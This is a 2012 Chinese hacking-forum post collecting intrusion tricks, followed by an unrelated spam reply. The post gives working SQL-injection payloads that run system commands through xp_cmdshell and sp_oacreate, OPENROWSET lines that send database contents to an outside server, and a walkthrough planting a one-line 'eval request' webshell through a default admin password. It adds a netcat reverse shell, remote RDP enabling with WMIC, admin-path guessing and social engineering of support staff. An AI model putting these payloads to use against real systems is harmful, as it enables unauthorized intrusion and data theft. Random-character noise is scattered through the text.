找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3229|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关( I  E3 t, f5 L. A
# h( {1 S9 C8 E" J0 N. B/ C. d
  ?! Z4 R8 ~9 H' Y9 n! {* b
SA点数据库分离搞法+语句:
9 p9 \- Q- r2 r  g( `  X+ F  e/ y* Z$ h
注射点不显错,执行下面三条语句页面都返回正常。0 }# L8 a" F2 Y& F6 Q
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')& m3 G( F' N9 P0 P4 r, T$ w
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
& j& q; W, \1 m4 _6 F- }: g8 Wand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')4 z( h! u5 \4 P) [7 H7 d
可以列目录,判断系统为2000,web与数据库分离$ a$ n0 t3 M9 o* Q8 G2 g
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
9 Q( r( Y1 i- t在注射点上执行! U3 ]( L' }! \9 E0 d8 f/ F" ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--/ o1 M0 ]6 ]6 ^1 H) k, H
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
) ]* ?/ Q& k, h: U) i还有我用NC监听得其他端口都没有得到IP。
/ ^$ W' k" w5 S2 g% P; g* @0 s9 m$ n
% W- j0 H( R% j) p+ R" N通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。5 E1 |, Q0 q0 v6 a$ M
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
- t7 L5 P! ?& K/ }  H& K% }. `) L4 k# X
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
" u. k/ L. |0 a$ K
" ?# }+ ]. e5 E% ~  I1 ^7 v现在就猜想是不是数据库是内网而且不能连外网。6 J2 F9 J& v6 c! Q; f' ^6 U+ l
5 e; f- t: K2 J( D

$ G3 c; G0 g6 V6 C# w! taccess导出txt文本代码$ D4 x% b8 X& {7 _" k
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
# v! |  v" {( p/ I
9 I# |& [: t6 V7 J0 ~; w: ~8 f4 q* V' z

0 c$ n9 f! o. [5 i$ j自动跳转到指定网站代码头
" t4 W' L# U, g! l% g% p! p<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>, L8 v* }" Y* N

6 ]; r3 K" m0 n: L3 o3 ?9 Z5 J; G0 ]; v4 n9 d, a- B: h4 _. g* K
入侵java or jsp站点时默认配置文件路径:6 ]4 S9 O4 K+ H# p- V- a% M
\web-inf\web.xml
) H9 m7 Q/ z  D; Z( Ytomcat下的配置文件位置:
7 G. m: I9 m+ i: y) d\conf\server.xml            (前面加上tomcat路径)
( y- B3 u2 Y3 o\Tomcat 5.0\webapps\root\web-inf\struts-config.xml3 `4 f8 i5 {7 W' n6 E+ s* x/ `4 `4 o
. H# k: K8 x  h

. U' H5 _( u1 C
+ V. z! M1 x4 x0 y/ W1 E4 D检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
$ Z2 }8 W  I2 A5 w-1%23
& ]* E& ~. E8 c1 j> 5 h3 j# x* v5 y
<
8 c+ ~0 S) `2 ~: c: Z2 {  R7 T1'+or+'1'='1
2 h/ Z2 p- d; x7 L2 zid=8%bf
0 L2 i5 D& T' R% w/ V% s
. k3 D7 R$ ^' X) q2 q# j) x全新注入点检测试法:5 f! u* I/ z7 P% _& z. y( B
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
+ A# h# e5 u9 `8 o' K3 Z8 D* V
6 S! ?& p, }  Y  v9 W8 p. f在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
! K1 p! Z0 @, G) {4 M' j. [. {& A* n" F& f" `
搜索型注入判断方法:
. g3 s+ e* r  k0 E北京%' and '1'='1' and '%'='
7 D1 Z+ L! r+ e) F; `北京%' and '1'='2' and '%'='
- k9 a& m* j- y6 D; J( `' ]2 ]2 e/ }
$ _0 V$ g# L6 S1 f7 L( {
COOKIES注入:& E2 w9 n; R, k1 I5 k5 Y4 T* [6 E
: }! P& A8 ^  P8 g* `# k, o
javascript:alert(document.cookie="id="+escape("51 and 1=1"));, {/ N! Z6 i( H( y
* j# o' d, `  f; }. @" Z
2000专业版查看本地登录用户命令:
+ q! X6 M) E, |* Z& I+ z1 M# h; ~net config workstation5 t0 e& Q& C2 T

" p- b# f5 a" T& |  j: D. I$ E" y! \9 a+ ^% S% [- Y' T# U
2003下查看ipsec配置和默认防火墙配置命令:7 c" D% v5 G# e
netsh firewall show config% ?0 v& }! Q( M: {: M
netsh ipsec static show all4 E. M/ |) P1 m. {  H
. g: q2 u! V7 O2 W
不指派指定策略命令:# z- J+ F: D5 v( ]' B% j
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名): i; a7 O3 F+ f* u! y* ?4 y
netsh ipsec static show policy all  显示策略名
& _$ E7 z1 }# N' t% Q  o
- _, z( s1 S( G0 m7 y
5 H& B4 J7 N1 I猜管理员后台小技巧:' B6 X3 ]( u/ n  b
admin/left.asp
5 n; y& N2 H5 r, f3 D9 @2 t7 ?& tadmin/main.asp! v; o( U' T3 n6 t# D. B
admin/top.asp1 D$ L7 P! w& G
admin/admin.asp : J4 ^5 F8 R3 X5 w, N6 H7 g
会现出菜单导航,然后迅雷下载全部链接
9 k" e/ u& V* _5 L
: x$ H0 a8 c: f' R! D2 x6 L! E  {9 J# f# B! W0 _" A: D
社会工程学:
3 c+ b8 d' j/ ~8 t/ c1 p用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
9 Z5 P& S& ?+ |1 A. }$ b. E0 \5 r然后去骗客服
8 s% G% J4 D+ C* d( b' P5 O# L" P( \$ M" W
; l3 B/ R8 D# S! o( {7 Q2 z$ D
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
" {: Q+ B  v2 g/ R8 h9 r查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
7 S: M; }7 k4 q4 Z' Z  r3 T  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
! V, q. M- I5 s6 y+ h  r1 X6 o6 J" E
  m/ C, d* \! G" z& ^' d
# ~) F) g8 a7 j) \: `
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)+ n/ n* e6 g( z( B# X# o

! A  p; v1 j) n+ y0 C) h" ~1 K, L/ t, q* A: \- _6 ^2 B

3 Y  v* m6 X* ]' |( I, VCMD加密注册表位置9 N- c( h1 o0 t
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
% l  r0 e* X) }. [AutoRun+ K0 C3 a1 O$ K
$ ~9 p( g( Y' B3 v  }; n& K
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
' [( o/ x7 ~" I+ P6 wAutoRun' z; ^% \' J% v. L6 W: T- A3 O$ _
3 f" W6 `6 |% Q. s4 h+ _) Z

. c3 c3 ?6 B$ N0 {) K8 Z在找注入时搜索Hidden,把他改成test
* Q2 |# s6 ]( A* T' z" g* X/ g3 t* T0 H" e! {$ Y$ |
7 {, n8 L; Y! f& _2 [1 D

. d4 }( l) g: K6 i5 k5 Jmstsc /v:IP /console
- Z4 B) w' t2 ]3 u6 P. k0 [8 k7 P) Q+ k3 s

% ?5 d- ?- b+ A  w一句话开3389:
: C7 i7 q! `) C8 n0 ^- b' y9 x# p! c
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  - I/ {4 K- ]& g- D. f
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.9 ^& i% ^" O5 D$ j) A; x
  Y: s" k, y7 q5 q' L% E
! z1 E$ r$ Z7 b3 ?: P! m& |/ W
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:- l5 I( O: n, a& k/ ~; D4 j
Insert into admin(user,pwd) values('test','test')
7 I' m9 E3 l0 Z0 w* g" l( g
8 J* B+ ]/ W2 A9 U
% }7 u# D2 ]1 oNC反弹
: F- C: ~( V4 _" j2 u3 P$ B先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   . S  z: ~9 G. c: t0 Q' [
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)0 j# I/ Y2 i! p; W! d6 l# O
/ \; M; F# V% o7 C* r1 b4 f

' \$ W1 q4 D$ h: x7 i0 @在脚本入侵过程中要经常常试用%00来确认下参数是否有问题7 ]) z! ]3 k! p6 ~1 P: w
; a  S& Q6 Q( L+ c4 I
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
' T0 ^1 n) k' ^; ?4 A例如:  U7 T0 o* N- j# Y5 `: S
subst k: d:\www\ 用d盘www目录替代k盘
, `9 z, L- p/ |subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表